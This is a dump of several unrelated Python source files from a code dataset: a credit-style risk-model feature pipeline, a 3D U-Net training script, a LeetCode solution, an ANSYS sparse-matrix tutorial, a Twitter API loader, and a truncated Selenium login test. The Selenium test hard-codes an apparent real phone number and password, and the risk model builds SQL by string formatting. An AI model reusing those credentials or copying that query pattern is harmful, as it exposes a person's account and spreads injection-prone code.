fg.f['inter_AmtPerAct_Wk2'] = fg.f['activation_amtActCurrent'] / (fg.f['activation_aveCntAct_Wk2'] + 0.01)\n fg.f['inter_amtActCurrent_aveEarning'] = fg.f['activation_amtActCurrent'] / (fg.f[\n 'bank_avgAmountPerEarningWithinNWeeksN_2'] + 0.01)\n\n @ah_datadog.datadog_timed(name=\"getAllFeatures\", tags=[\"operation:maxAdjustment\"])\n def getAllFeatures(self,uid):\n\n # print(\"Start calculating features for %d\"%uid)\n log = ah_config.getLogger('ah.max_adjustment_model')\n start = time.time()\n activation = ActivationFeature(uid)\n end = time.time()\n log.debug('Time elapsed for activation feature queries: '\n '%d sec for user %s', end-start, uid)\n start = end\n\n bank = BankFeature_predict(uid)\n end = time.time()\n log.debug('Time elapsed for bank feature queries: '\n '%d sec for user %s', end-start, uid)\n start = end\n\n payroll = Payroll(uid)\n end = time.time()\n log.debug('Time elapsed for payroll feature queries: '\n '%d sec for user %s', end-start, uid)\n start = end\n\n device = DeviceFeature(uid)\n end = time.time()\n log.debug('Time elapsed for device feature queries: '\n '%d sec for user %s', end-start, uid)\n start = end\n\n user = 
UserFeature(uid)\n end = time.time()\n log.debug('Time elapsed for user feature queries: '\n '%d sec for user %s', end-start, uid)\n start = end\n\n employment = EmploymentFeature(uid)\n end = time.time()\n log.debug('Time elapsed for employment feature queries: '\n '%d sec for user %s', end-start, uid)\n start = end\n\n cs = CSFeature(uid)\n end = time.time()\n log.debug('Time elapsed for CS feature queries: '\n '%d sec for user %s', end-start, uid)\n start = end\n\n #pip = PIPFeature(uid)\n #end = time.time()\n #log.debug('Time elapsed for PIP feature queries: '\n # '%d sec for user %s', end-start, uid)\n #start = end\n\n timesheet = TimeSheetFeature(uid)\n end = time.time()\n log.debug('Time elapsed for timesheet feature queries: '\n '%d sec for user %s', end-start, uid)\n start = end\n\n new = NewFeature(uid)\n end = time.time()\n log.debug('Time elapsed for new feature queries: '\n '%d sec for user %s', end-start, uid)\n start = end\n\n currentMax = CurrentMaxFeature(uid)\n end = time.time()\n log.debug('Time elapsed for max feature queries: '\n '%d sec for user %s', end - start, uid)\n start = end\n\n season = SeasonFeature()\n end = time.time()\n log.debug('Time elapsed for season feature queries: '\n '%d sec', end - start)\n\n# if len(payroll.data) == 0 or len(activation.data)==0:\n# print(\"no payroll data or no activation data %d\" % uid)\n\n# return None\n# else:\n\n predTime = datetime.utcnow() #+ timedelta(hours=-4)\n # datetime.now(eastern)\n\n fg = FeatureGenerator(uid, predTime)\n\n currentact={}\n currentact['RequestTime']=predTime\n currentact['IsFail']=None\n currentact['IsLoss']=None\n currentact['RestoreReturnCodeAch']=None\n currentact['Amount']=100\n currentact['RestoreDate']=predTime\n currentact['ActivationDate']=predTime\n currentact['activationid']=0\n\n # print((predTime-activation.data[-1]['RequestTime']).total_seconds())\n if len(activation.data)>0 and (predTime-activation.data[-1]['RequestTime']).total_seconds()<60:\n currentact=activation.data.pop()\n\n fg.feature_currentActivation(currentact)\n fg.feature_generator(activation)\n fg.feature_generator(payroll)\n fg.feature_generator(device)\n fg.feature_generator(season)\n fg.feature_generator(user)\n fg.feature_generator(employment)\n fg.feature_generator(cs)\n fg.feature_generator(bank)\n # fg.feature_generator(pip)\n fg.feature_generator(timesheet)\n fg.feature_generator(new)\n fg.feature_generator(currentMax)\n self.createDerivedFeature(fg)\n self.createInterFeature(fg)\n return fg\n\n def get_pay_dates(self, uid):\n sql = '''SELECT distinct CAST(paydate AS DATETIME) as paydate \n FROM Payroll.PayrollActiveStatusTracking \n Where UserId = {} order by paydate'''.format(uid)\n rows = ah_db.execute_to_json('payroll', sql)\n return [l['paydate'] for l in rows]\n\n def getPredTimeTarget(self,activation,uid):\n\n restore={}\n\n for l in activation.data:\n\n rdate=l['RestoreDate']\n\n if l['ActFail']==0:\n if rdate not in restore: restore[rdate]=Restore(l)\n else: restore[rdate].update(l)\n\n paydates = self.get_pay_dates(uid)\n\n predTimeTarget=[]\n\n rdates=sorted(restore.keys(),reverse=True)\n\n # print(rdates)\n for i in range(0,len(rdates)-2):\n rdate=rdates[i]\n r=restore[rdate]\n predtime=rdate-timedelta(7)\n while len(paydates)>0 and paydates[-1]>=rdate:\n paydates.pop()\n if len(paydates)>0:\n if (rdate-paydates[-1]).days<35 and paydates[-1]predtime: predtime=rdates[i+1]\n\n # print(predtime)\n predtime=predtime-timedelta(2)\n if predtime 0:\n if n % 1000 == 0:\n print(n)\n n += 1\n try:\n uid = 
uids.pop()\n print('uid=' + str(uid))\n uid = int(uid)\n activation = ActivationFeature(uid,scoring=False)\n bank = BankFeature(uid)\n payroll = Payroll(uid)\n device = DeviceFeature(uid)\n user = UserFeature(uid)\n employment = EmploymentFeature(uid)\n cs = CSFeature(uid)\n # pip = PIPFeature(uid)\n timesheet = TimeSheetFeature(uid)\n new = NewFeature(uid)\n currentMax = CurrentMaxFeature(uid)\n season = SeasonFeature()\n #print(\"initialized feature objects for user:{}\".format(uid))\n # break\n # if len(payroll.data) == 0:\n # print(\"no payroll data %d\" % uid)\n # continue\n\n # print(uid, datetime.now())\n # self.conn.close()\n # self.conn = connect_db(30)\n # print('Datebase reconnected!')\n\n predtimetarget=self.getPredTimeTarget(activation,uid)\n except:\n print(uid, traceback.format_exc())\n uids.append(uid)\n return uids\n\n\n for pt in predtimetarget:\n # print (uid,pt)\n\n predTime = pt[2]\n\n if predTime > datetime(2017, 10, 31):\n\n fg = FeatureGenerator(uid, predTime)\n\n fg.f['IsFail']=pt[0]\n fg.f['IsLoss']=pt[1]\n fg.feature_generator(activation)\n fg.feature_generator(bank)\n fg.feature_generator(payroll)\n fg.feature_generator(device)\n fg.feature_generator(season)\n fg.feature_generator(user)\n fg.feature_generator(employment)\n fg.feature_generator(cs)\n # fg.feature_generator(pip)\n fg.feature_generator(timesheet)\n fg.feature_generator(new)\n fg.feature_generator(currentMax)\n try:\n self.createDerivedFeature(fg)\n self.createInterFeature(fg)\n except:\n print(uid)\n print(traceback.format_exc())\n if writer is None:\n fieldnames = list(fg.f.keys())\n writer = csv.DictWriter(fout, fieldnames=fieldnames)\n\n writer.writeheader()\n\n fg.printFeatures(writer)\n\n return uids\n\n def testScore(self):\n filepath = './modeling/model/risk_model/activation_risk_model/log/'\n filename = 'score_tmp.csv'\n\n while True:\n try:\n fout = open(filepath+filename, 'w')\n break\n except IOError:\n os.mkdir(filepath)\n\n writer = csv.writer(fout, delimiter=',')\n writer.writerow(['UserId', 'Risk Score'])\n model = ActivationRiskModel()\n uids = model.getAllUserIdMaxAdjust()\n # uids = [23528]\n for uid in uids:\n try:\n fg = model.getAllFeatures(uid)\n\n try:\n score = model.getScore(fg.f)\n except:\n score = -1\n except:\n score = -10\n\n writer.writerow([uid, score])\n\n print(score)\n model.__writeDB__(fg.f)\n\n\ndef prepareTrainingData(uids):\n\n filepath = './modeling/model/risk_model/max_adjustment_model/data/'\n filename = 'master_%d.csv'%os.getpid()\n\n while True:\n try:\n fout = open(filepath+filename, 'a+', encoding='utf-8')\n break\n except IOError:\n os.mkdir(filepath)\n\n model = MaxAdjustmentModel()\n while len(uids) > 0:\n try:\n uids = model.createMaster(fout, uids)\n except:\n print(datetime.now(), \"restarted data generation\")\n\n fout.close()\n\n\ndef test(uid):\n log = ah_config.getLogger('ah.max_adjustment_model')\n log.info('connected to DB')\n import modeling.misc.predictor as pred\n ah_config.initialize()\n model = MaxAdjustmentModel()\n fg = model.getAllFeatures(uid)\n predictor = pred.Predictor(fg.f)\n predictor.getReasonCategory()\n return 1\n\n\nif __name__ == \"__main__\":\n filepath = './modeling/model/max_adjustment/data/'\n useridfile = 'alluserid.csv'\n\n ah_config.initialize()\n import os\n cmd = 'rm -f ' + filepath + 'master*.csv'\n os.system(cmd)\n\n model = MaxAdjustmentModel()\n uids = 8726\n fg = model.getAllFeatures(uids)\n print(fg.f)\n\n '''\n from numpy import *\n uids = model.getAllUserId()\n print(len(uids))\n from random import 
randint\n\n df = pd.DataFrame(uids)\n df.to_csv(filepath + useridfile)\n\n uids = pd.read_csv(filepath + useridfile)['0'].tolist()\n\n nprocess=8\n\n uids = [[uids[i] for i in range(len(uids)) if i % nprocess == x] for x in range(nprocess)]\n for i in uids: print(len(i))\n\n pool = Pool(processes=nprocess)\n uids = pool.map(prepareTrainingData, uids)\n '''\n\n\n\n # filename = 'master_*.csv'\n # cmd = ''\n # cmd = 'cat ' + filepath + filename + ' > '\n # os.system()\n\n\n # conn = connect_db(30)\n\n # filepath = './modeling/model/risk_model/activation_risk_model/data/'\n # filename = 'master.csv'\n\n # while True:\n # try:\n # fout = open(filepath+filename, 'w')\n # break\n # except IOError:\n # os.mkdir(filepath)\n\n\n\n # model = ActivationRiskModel(conn)\n # # # print (fg.f)\n # model.createMaster(fout)\n\n # fout.close()\n\n ###########################################\n # connection = connect_db(30)\n # uids = [45563,\n # 221451,\n # 220509,\n # 217584,\n # 218629,\n # 227137,\n # 223211,\n # 222097,\n # 210520,\n # 83029,\n # 151098,\n # 192160,\n # 223137,\n # 212042,\n # 221115]\n # uids = [60768]\n # model = MaxAdjustmentModel(connection)\n # for uid in uids:\n # print(uid)\n # fg = model.getAllFeatures(uid)\n\n # predictor = Predictor(fg.f)\n # print(predictor.getScore())\n # # print(predictor.getReasonCode())\n # print(predictor.getReasonCategory())\n #############################################\n\n # #############################################\n # connection = connect_db(30)\n # sql = '''\n # SET TRANSACTION ISOLATION LEVEL READ UNCOMMITTED\n # SELECT UserID\n # FROM Transactions\n # WHERE TransactionTypeID = '1' or TransactionTypeID = '9'\n # GROUP BY UserID\n # HAVING MAX(Date) > '2016-06-18'\n # '''\n # df = pd.read_sql(sql, con=connection)\n # # cursor = connection.cursor(as_dict=True)\n # uids = df['UserID'].values\n # log.info('connected to DB')\n\n # model = MaxAdjustmentModel(connection)\n\n # f = open('activeuser_max_model.csv', 'w')\n # writer = csv.DictWriter(f, fieldnames=['UserId', 'score'])\n # writer.writeheader()\n\n # for uid in uids:\n # print(uid)\n # fg = model.getAllFeatures(str(uid))\n\n # predictor = Predictor(fg.f)\n # writer.writerow({'UserId': uid, 'score': predictor.getScore()})\n\n # f.close()\n # connnection.close()\n # #################################################\n\n # connection = connect_db(30)\n # sql = '''\n # SET TRANSACTION ISOLATION LEVEL READ UNCOMMITTED\n # SELECT UserID\n # FROM Transactions\n # WHERE TransactionTypeID = '1' or TransactionTypeID = '9'\n # GROUP BY UserID\n # HAVING MAX(Date) >= '2016-07-01'\n # '''\n # df = pd.read_sql(sql, con=connection)\n # # cursor = connection.cursor(as_dict=True)\n # uids = df['UserID'].values\n # N = df.shape[0]\n # log.info('connected to DB')\n\n # model = MaxAdjustmentModel(connection)\n\n # f = open('activeuser_max_reason_score.csv', 'w')\n # writer = csv.DictWriter(f, fieldnames=['Reason', 'score'])\n # writer.writeheader()\n\n # reasons = dict()\n # for uid in uids:\n # try:\n # print(uid)\n # fg = model.getAllFeatures(str(uid))\n\n # predictor = Predictor(fg.f)\n # reason = predictor.getReasonCategory()\n # if reasons:\n # for res in reasons:\n # reasons[res] += reason[res]/N\n # else:\n # reasons = reason\n # except:\n # pass\n\n # for res in reasons:\n # writer.writerow({'Reason': res, 'score': reasons[res]/N})\n\n # f.close()\n # connnection.close()\n", "sub_path": "src/modeling/model/max_adjustment/MaxAdjustmentModel.py", "file_name": "MaxAdjustmentModel.py", "file_ext": "py", 
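Editor's note: the commented-out __main__ above shards user ids round-robin across processes and fans them out with multiprocessing.Pool. A standalone sketch of that pattern; worker is a stand-in for prepareTrainingData:

from multiprocessing import Pool

def worker(uid_shard):
    return [uid * 2 for uid in uid_shard]  # placeholder for per-shard feature generation

if __name__ == "__main__":
    uids = list(range(100))
    nprocess = 8
    # uids[x::nprocess] yields the same split as the i % nprocess list comprehension above
    shards = [uids[x::nprocess] for x in range(nprocess)]
    with Pool(processes=nprocess) as pool:
        results = pool.map(worker, shards)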
"file_size_in_byte": 21122, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "os.path.dirname", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 29, "usage_type": "call"}, {"api_name": "ah_db.open_mysql_cursor", "line_number": 48, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 50, "usage_type": "call"}, {"api_name": "ah_db.open_mysql_cursor", "line_number": 52, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 55, "usage_type": "call"}, {"api_name": "ah_config.getLogger", "line_number": 133, "usage_type": "call"}, {"api_name": "time.time", "line_number": 134, "usage_type": "call"}, {"api_name": "modeling.feature.feature_activation.ActivationFeature", "line_number": 135, "usage_type": "call"}, {"api_name": "time.time", "line_number": 136, "usage_type": "call"}, {"api_name": "modeling.feature.feature_bank.BankFeature_predict", "line_number": 141, "usage_type": "call"}, {"api_name": "time.time", "line_number": 142, "usage_type": "call"}, {"api_name": "modeling.feature.feature_payroll.Payroll", "line_number": 147, "usage_type": "call"}, {"api_name": "time.time", "line_number": 148, "usage_type": "call"}, {"api_name": "modeling.feature.feature_device.DeviceFeature", "line_number": 153, "usage_type": "call"}, {"api_name": "time.time", "line_number": 154, "usage_type": "call"}, {"api_name": "modeling.feature.feature_user.UserFeature", "line_number": 159, "usage_type": "call"}, {"api_name": "time.time", "line_number": 160, "usage_type": "call"}, {"api_name": "modeling.feature.feature_employment.EmploymentFeature", "line_number": 165, "usage_type": "call"}, {"api_name": "time.time", "line_number": 166, "usage_type": "call"}, {"api_name": "modeling.feature.feature_cs.CSFeature", "line_number": 171, "usage_type": "call"}, {"api_name": "time.time", "line_number": 172, "usage_type": "call"}, {"api_name": "modeling.feature.feature_timesheet.TimeSheetFeature", "line_number": 183, "usage_type": "call"}, {"api_name": "time.time", "line_number": 184, "usage_type": "call"}, {"api_name": "modeling.feature.feature_new.NewFeature", "line_number": 189, "usage_type": "call"}, {"api_name": "time.time", "line_number": 190, "usage_type": "call"}, {"api_name": "modeling.feature.feature_currentMax.CurrentMaxFeature", "line_number": 195, "usage_type": "call"}, {"api_name": "time.time", "line_number": 196, "usage_type": "call"}, {"api_name": "modeling.feature.feature_season.SeasonFeature", "line_number": 201, "usage_type": "call"}, {"api_name": "time.time", "line_number": 202, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 212, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 212, "usage_type": "name"}, {"api_name": "modeling.feature.feature_generator.FeatureGenerator", "line_number": 215, "usage_type": "call"}, {"api_name": "ah_datadog.datadog_timed", "line_number": 129, "usage_type": "call"}, {"api_name": "ah_db.execute_to_json", "line_number": 252, "usage_type": "call"}, {"api_name": "modeling.feature.feature_activation.Restore", "line_number": 264, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 277, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 288, "usage_type": "call"}, {"api_name": "modeling.feature.feature_activation.ActivationFeature", "line_number": 311, "usage_type": "call"}, 
{"api_name": "modeling.feature.feature_bank.BankFeature", "line_number": 312, "usage_type": "call"}, {"api_name": "modeling.feature.feature_payroll.Payroll", "line_number": 313, "usage_type": "call"}, {"api_name": "modeling.feature.feature_device.DeviceFeature", "line_number": 314, "usage_type": "call"}, {"api_name": "modeling.feature.feature_user.UserFeature", "line_number": 315, "usage_type": "call"}, {"api_name": "modeling.feature.feature_employment.EmploymentFeature", "line_number": 316, "usage_type": "call"}, {"api_name": "modeling.feature.feature_cs.CSFeature", "line_number": 317, "usage_type": "call"}, {"api_name": "modeling.feature.feature_timesheet.TimeSheetFeature", "line_number": 319, "usage_type": "call"}, {"api_name": "modeling.feature.feature_new.NewFeature", "line_number": 320, "usage_type": "call"}, {"api_name": "modeling.feature.feature_currentMax.CurrentMaxFeature", "line_number": 321, "usage_type": "call"}, {"api_name": "modeling.feature.feature_season.SeasonFeature", "line_number": 322, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 336, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 346, "usage_type": "call"}, {"api_name": "modeling.feature.feature_generator.FeatureGenerator", "line_number": 348, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 369, "usage_type": "call"}, {"api_name": "csv.DictWriter", "line_number": 372, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 389, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 391, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 416, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 423, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 430, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 430, "usage_type": "name"}, {"api_name": "ah_config.getLogger", "line_number": 436, "usage_type": "call"}, {"api_name": "ah_config.initialize", "line_number": 439, "usage_type": "call"}, {"api_name": "modeling.misc.predictor.Predictor", "line_number": 442, "usage_type": "call"}, {"api_name": "modeling.misc.predictor", "line_number": 442, "usage_type": "name"}, {"api_name": "ah_config.initialize", "line_number": 451, "usage_type": "call"}, {"api_name": "os.system", "line_number": 454, "usage_type": "call"}]} +{"seq_id": "136159849", "text": "import os\nimport glob\nimport sys\nimport random\nfrom argparse import ArgumentParser\nimport scipy.io as sio\n\nimport keras\nimport tensorflow as tf\nimport numpy as np\nfrom keras.backend.tensorflow_backend import set_session\nfrom keras.models import load_model, Model\nfrom keras.optimizers import Adam\n\nimport network\n# import networks\nimport data_gen\nimport losses\nimport random\n\nsys.path.append('ext/neuron')\nimport metrics\nimport models \nfrom metrics import Dice\n\n# base data directory\nbase_data_dir = 'Your Data directory'\n# I use npz file but change to any other image file format\ntrain_vols_data = glob.glob(base_data_dir + '/*.npz')\ntrain_labels_data = glob.glob(base_data_dir + '/*.npz')\n\n# Sort the volume and labels to match their names\ntrain_vols_data.sort()\ntrain_labels_data.sort()\n \ndef train(save_name, gpu_id, num_data,iters,load,save_iters,num_labels):\n \n # Anatomical Label to evaluate\n labels = sio.loadmat('labels.mat')['labels'][0]\n\n # Patch size and stride \n patch_size = [64,64,64]\n stride = 32\n vol_size = (160, 192, 224)\n\n # Generates the list of random patches for 
training volume and labels\n\n\n gpu = '/gpu:' + str(gpu_id) \n os.environ[\"CUDA_VISIBLE_DEVICES\"] = str(gpu_id)\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n config.allow_soft_placement = True\n set_session(tf.Session(config=config))\n\n model_dir = 'models/' + save_name\n if not os.path.isdir(model_dir):\n os.mkdir(model_dir)\n trf_label_model = data_gen.linear_label_trf(vol_size, indexing='ij')\n trf_vol_model = data_gen.linear_vol_trf(vol_size, indexing='ij')\n resize_model = data_gen.resize_flow(zoom_factor = 16)\n\n with tf.device(gpu):\n # Use dice score for the metric\n # adjust input size based on size of data\n # loss_1 is dice score\n model = network.unet(input_size=(64,64,64,1)) \n model.compile(optimizer=Adam(lr=1e-4), loss='categorical_crossentropy', metrics=[Dice(nb_labels=num_labels).loss])\n\n # load weights of model when continue training\n if load_model is not None:\n print('loading', load_model)\n model.load_weights(load_model)\n\n train_data = data_gen.example_gen(train_vols_data)\n initial_epoch = 0\n for step in range(iters):\n train_vols, train_labels = data_gen.vol_and_label_generator_patch(vol_gen = train_data, \n trf_vol_model=trf_vol_model,\n trf_label_model=trf_label_model,\n resize_model = resize_model, \n patch_size = patch_size,\n labels = labels, \n stride_patch = stride)\n\n train_loss = model.fit(x=train_vols, y=train_labels, epochs=1, batch_size=1, shuffle=True, initial_epoch = initial_epoch,verbose=0)\n\n if(step % save_iters == 0):\n model.save(model_dir + '/' + str(step) + '.h5')\n if not isinstance(train_loss, list):\n train_loss = [train_loss.history['loss'],train_loss.history['loss_1']]\n\n print(step, 1, train_loss)\n\nif __name__ == \"__main__\":\n parser = ArgumentParser()\n parser.add_argument(\"--save_name\", type=str,required=True,dest=\"save_name\", help=\"Name of training model for saving\")\n parser.add_argument(\"--gpu\", type=int,required=True, dest=\"gpu_id\", help=\"gpu id number\")\n parser.add_argument(\"--nb_data\", type=int,required=True, dest=\"num_data\", help=\"number of data will be trained\")\n parser.add_argument(\"--iters\", type=int,required=True, dest=\"iters\", help=\"number of epoch\")\n parser.add_argument(\"--load\", type=str,required=False,dest=\"load_model\", default=None, help=\"model to continue from\")\n parser.add_argument(\"--save_iters\", type=int,required=True, dest=\"save_iters\", help=\"saving iters\")\n parser.add_argument(\"--num_labels\", type=int, default=30, dest=\"num_labels\", help=\"number of interest labels\")\n\n args = parser.parse_args()\n train(**vars(args))\n", "sub_path": "train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 4333, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "sys.path.append", "line_number": 21, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 29, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 30, "usage_type": "call"}, {"api_name": "scipy.io.loadmat", "line_number": 39, "usage_type": "call"}, {"api_name": "scipy.io", "line_number": 39, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 50, "usage_type": "attribute"}, {"api_name": "tensorflow.ConfigProto", "line_number": 51, "usage_type": "call"}, {"api_name": "keras.backend.tensorflow_backend.set_session", "line_number": 54, "usage_type": "call"}, {"api_name": "tensorflow.Session", 
"line_number": 54, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path", "line_number": 57, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 58, "usage_type": "call"}, {"api_name": "data_gen.linear_label_trf", "line_number": 59, "usage_type": "call"}, {"api_name": "data_gen.linear_vol_trf", "line_number": 60, "usage_type": "call"}, {"api_name": "data_gen.resize_flow", "line_number": 61, "usage_type": "call"}, {"api_name": "tensorflow.device", "line_number": 63, "usage_type": "call"}, {"api_name": "network.unet", "line_number": 67, "usage_type": "call"}, {"api_name": "keras.optimizers.Adam", "line_number": 68, "usage_type": "call"}, {"api_name": "metrics.Dice", "line_number": 68, "usage_type": "call"}, {"api_name": "keras.models.load_model", "line_number": 71, "usage_type": "name"}, {"api_name": "keras.models.load_model", "line_number": 72, "usage_type": "argument"}, {"api_name": "keras.models.load_model", "line_number": 73, "usage_type": "argument"}, {"api_name": "data_gen.example_gen", "line_number": 75, "usage_type": "call"}, {"api_name": "data_gen.vol_and_label_generator_patch", "line_number": 78, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 96, "usage_type": "call"}]} +{"seq_id": "468414841", "text": "\"\"\"\nYou are a professional robber planning to rob houses along a street.\nEach house has a certain amount of money stashed,\nthe only constraint stopping you from robbing each of them is\nthat adjacent houses have security system connected\nand it will automatically contact the police\nif two adjacent houses were broken into on the same night.\n\nGiven a list of non-negative integers representing\nthe amount of money of each house,\ndetermine the maximum amount of money\nyou can rob tonight without alerting the police.\n\"\"\"\n\n\nclass Solution:\n # @param num, a list of integer\n # @return an integer\n def rob(self, num):\n \"\"\" Let Sn is the amount that the number n house had been robbed,\n Un is the amount that the number n house hadn't been robbed\n Vn is the amount that the number n house stashed\n So Sn = Un-1 + Vn, Un = Max(Sn-1, Un-1)\n Result = Max(Sn, Un) = Max(Un-1+Vn, Sn-1)\n and S0 = 0, U0 = 0\n \"\"\"\n unrobbed = robbed = 0\n for i in num:\n robbed, unrobbed = unrobbed + i, max(robbed, unrobbed)\n\n return max(robbed, unrobbed)\n\n\nif __name__ == '__main__':\n from utils import do_test\n t = do_test.MyTest(\n Solution().rob,\n [([1, 2, 3, 4, 5], 9)]\n )\n print(t.run())", "sub_path": "leetcode/algorithms/house-robber.py", "file_name": "house-robber.py", "file_ext": "py", "file_size_in_byte": 1311, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "utils.do_test.MyTest", "line_number": 36, "usage_type": "call"}, {"api_name": "utils.do_test", "line_number": 36, "usage_type": "name"}]} +{"seq_id": "365897706", "text": "\"\"\"\nAPDLMath Sparse Matrices and SciPy Sparse Matrices\n-------------------------------------------------------------------\n\nThis tutorial will show how to get APDLMath sparse matrices from FULL\nfiles to SciPy Sparse Matrices.\n\n\n\"\"\"\nimport matplotlib.pylab as plt\n\nfrom ansys.mapdl.core import launch_mapdl\nfrom ansys.mapdl.core.examples import vmfiles\n\nmapdl = launch_mapdl()\nmm = mapdl.math\n\n\n################################################################################\n# Load and solve verification manual example 153. 
Then load the\n# stiffness matrix into APDLmath.\nout = mapdl.input(vmfiles[\"vm153\"])\nk = mm.stiff(fname=\"PRSMEMB.full\")\nk\n\n################################################################################\n# Copy this APDLMath Sparse Matrix to a SciPy CSR matrix and plot the\n# graph of the sparse matrix\npk = k.asarray()\nplt.spy(pk)\n\n\n################################################################################\n# You can access the 3 vectors that describe this sparse matrix with.\n#\n# - ``pk.data``\n# - ``pk.indices``\n# - ``pk.indptr``\n#\n# See the ``scipy`` documentation of the csr matrix at `scipy.sparse.csr_matrix `_ for additional details.\n\nprint(pk.data[:10])\nprint(pk.indices[:10])\nprint(pk.indptr[:10])\n\n\n################################################################################\n# ### Create a APDLMath Sparse Matrix from a SciPy Sparse CSR Matrix\n#\n# Here, we transfer the ``scipy`` CSR matrix back to MAPDL. While\n# this example uses a matrix that was originally within MAPDL, you can\n# load any CSR matrix to MAPDL.\n\nmy_mat = mm.matrix(pk, \"my_mat\", triu=True)\nmy_mat\n\n################################################################################\n# Check initial matrix ``k`` and ``my_mat`` are exactly the sames:\n# We compute the norm of the difference, should be zero\n\nmsub = k - my_mat\nmm.norm(msub)\n\n\n################################################################################\n# CSR Representation in MAPDL\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~\n#\n# Printing the list of objects in the MAPDL space, we find:\n#\n# - 2 SMAT objects, corresponding to the ``k``, ``MSub`` matrices,\n# - with encrypted names\n# - The ``my_mat`` SMAT object. Its size is zero, because the 3\n# - vectors are stored separately\n# - the 3 vectors of the CSR my_mat structure: ``MY_MAT_PTR``, ``MY_MAT_IND``\n# - and ``MY_MAT_DATA``\n\nmm.status()\n\n\n################################################################################\n# MAPDL Python Matrix Correspondence\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n#\n# To determine which MAPDL object corresponds to which Python object,\n# access the id property of the Python object.\n\nprint(\"name(k)=\" + k.id)\nprint(\"name(my_mat)=\" + my_mat.id)\nprint(\"name(msub)=\" + msub.id)\n\n\n###############################################################################\n# Stop mapdl\n# ~~~~~~~~~~\n#\nmapdl.exit()\n", "sub_path": "examples/01-apdlmath-examples/scipy_sparse_matrix.py", "file_name": "scipy_sparse_matrix.py", "file_ext": "py", "file_size_in_byte": 2940, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "ansys.mapdl.core.launch_mapdl", "line_number": 15, "usage_type": "call"}, {"api_name": "ansys.mapdl.core.examples.vmfiles", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pylab.spy", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 30, "usage_type": "name"}]} +{"seq_id": "243855101", "text": "import configparser\nimport twitter\nfrom os import path\n\nROOT = path.dirname(path.realpath(__file__))\n\nconfig = configparser.ConfigParser()\nconfig.read(path.join(ROOT, 'twitter_auth.ini'))\n\nmy_consumer_key=config['DEFAULT']['my_consumer_key']\nmy_consumer_secret=config['DEFAULT']['my_consumer_secret']\nmy_access_token_key=config['DEFAULT']['my_access_token_key']\nmy_access_token_secret=config['DEFAULT']['my_access_token_secret']\n\ndef getApi():\n return 
twitter.Api(consumer_key=my_consumer_key, consumer_secret=my_consumer_secret, access_token_key=my_access_token_key, access_token_secret=my_access_token_secret, tweet_mode='extended')\n\n", "sub_path": "twitterGetApi.py", "file_name": "twitterGetApi.py", "file_ext": "py", "file_size_in_byte": 639, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "os.path.dirname", "line_number": 5, "usage_type": "call"}, {"api_name": "os.path", "line_number": 5, "usage_type": "name"}, {"api_name": "os.path.realpath", "line_number": 5, "usage_type": "call"}, {"api_name": "configparser.ConfigParser", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path", "line_number": 8, "usage_type": "name"}, {"api_name": "twitter.Api", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "56010768", "text": "# coding:UTF-8\nimport time\nimport unittest\nfrom time import sleep\n\nimport selenium\nfrom selenium import webdriver\n\n\nclass TestLogin(unittest.TestCase):\n\n # init\n def setUp(self):\n self.driver = webdriver.Chrome()\n self.driver.get(\"https://xdclass.net/#/index\")\n self.driver.maximize_window()\n self.driver.implicitly_wait(20)\n self.driver.find_element_by_css_selector(\n \"#app > div > div.get_main > div > div.closed\"\n ).click()\n\n #\n def tearDown(self) -> None:\n sleep(2)\n self.driver.quit()\n\n # 定义登录测试方法 验证码为空\n def testLogin(self):\n driver = self.driver\n driver.find_element_by_css_selector(\n \"#app > div > div:nth-child(1) > div.header > div.r_userinfo.f_r > div.login > span:nth-child(2)\"\n ).click()\n\n driver.find_element_by_css_selector(\n \"#app > div > div:nth-child(1) > div.header > div.main > div.login > div > div.mobienum > input[type=text]\"\n ).send_keys(\"15535160433\")\n sleep(2)\n\n driver.find_element_by_css_selector(\n \"#app > div > div:nth-child(1) > div.header > div.main > div.login > div > div.psw > input[type=password]\"\n ).send_keys(\"li796093\")\n sleep(2)\n\n driver.find_element_by_css_selector(\n \"#app > div > div:nth-child(1) > div.header > div.main > div.login > div > 